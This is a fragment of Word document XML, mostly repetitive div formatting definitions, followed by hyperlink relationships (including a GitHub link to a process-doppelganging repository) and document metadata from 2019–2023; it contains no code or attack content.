              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1128399569">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="659383936">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="16097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34269342">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58606310">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="851191376">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2076194314">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1205024295">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2069649998">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2004358646">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="376322329">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="495655156">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1484665734">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="738333817">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1861385463">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1242594144">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="908073693">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="418983543">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="738021780">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="746075043">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="294914327">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="952326692">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="722824920">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="46030523">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1104762811">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1201747071">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="347870875">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1465779537">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="48504471">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="335958571">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1652320799">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1522620413">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="728191119">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2835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mPqGGSOGzcM" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hasherezade/process_doppelgangin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outu.be/mPqGGSOGzcM"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8</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42</cp:revision>
  <cp:lastPrinted>2019-03-26T14:54:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-09T08:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-01T18:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>